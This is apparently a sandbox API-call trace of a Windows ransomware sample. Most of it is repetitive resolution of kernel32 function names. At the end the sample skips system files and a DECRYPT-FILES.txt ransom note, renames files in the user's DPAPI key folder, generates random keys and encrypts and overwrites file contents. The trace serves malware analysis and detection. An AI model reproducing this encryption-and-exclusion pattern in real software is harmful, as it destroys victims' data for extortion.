[0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.322] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.322] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.322] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.322] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.322] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.322] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.322] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.322] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.322] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.322] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.322] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.322] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.322] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.322] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.322] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.323] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.323] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.323] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.323] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.323] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.323] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.323] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.323] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.323] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.323] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.323] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.323] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.323] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.323] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.323] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.323] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.323] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.323] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.323] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.324] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.324] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.324] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.324] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.324] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.324] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.324] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.324] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.324] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.324] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.324] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.324] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.324] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.324] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.324] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.324] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.324] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.324] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.325] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.325] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.325] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.325] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.325] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.325] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.325] lstrlenA (lpString="DELETEATOM") returned 10 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.325] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.325] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.325] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.325] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.325] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.325] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.325] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.325] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.325] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.325] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.325] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.325] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.326] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.326] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.326] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.326] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.326] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.326] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.326] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.326] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.326] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.326] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.326] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.326] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.326] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.326] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.326] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.326] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.326] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.326] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.326] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.327] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.327] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.327] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.327] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.327] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.327] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.327] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.327] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.327] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.327] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.327] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.327] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.327] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.327] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned 147 [0078.327] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV") returned 155 [0078.327] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.hlgbcev"), dwFlags=0x0) returned 1 [0078.328] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.328] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.329] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.329] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xdc5ea830, ftCreationTime.dwHighDateTime=0x1d41fce, ftLastAccessTime.dwLowDateTime=0xdc5ea830, ftLastAccessTime.dwHighDateTime=0x1d41fce, ftLastWriteTime.dwLowDateTime=0xdc5ea830, ftLastWriteTime.dwHighDateTime=0x1d41fce, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="0e15476d-d8fe-46ca-8099-ebdcf80f637c", cAlternateFileName="0E1547~1")) returned 1 [0078.329] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="DECRYPT-FILES.txt") returned -1 [0078.329] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="autorun.inf") returned -1 [0078.329] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="boot.ini") returned -1 [0078.329] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="desktop.ini") returned -1 [0078.329] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="ntuser.dat") returned -1 [0078.329] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="iconcache.db") returned -1 [0078.329] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="bootsect.bak") returned -1 [0078.329] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="ntuser.dat.log") returned -1 [0078.329] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="thumbs.db") returned -1 [0078.329] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="Bootfont.bin") returned -1 [0078.329] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0078.329] lstrlenW (lpString="0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 36 [0078.329] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0078.329] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="0e15476d-d8fe-46ca-8099-ebdcf80f637c" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" [0078.329] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.330] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=468) returned 1 [0078.330] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.330] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.331] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.331] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.331] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.331] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.331] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.332] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.332] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.332] CloseHandle (hObject=0x45c) returned 1 [0078.332] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.332] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.335] CloseHandle (hObject=0x0) returned 0 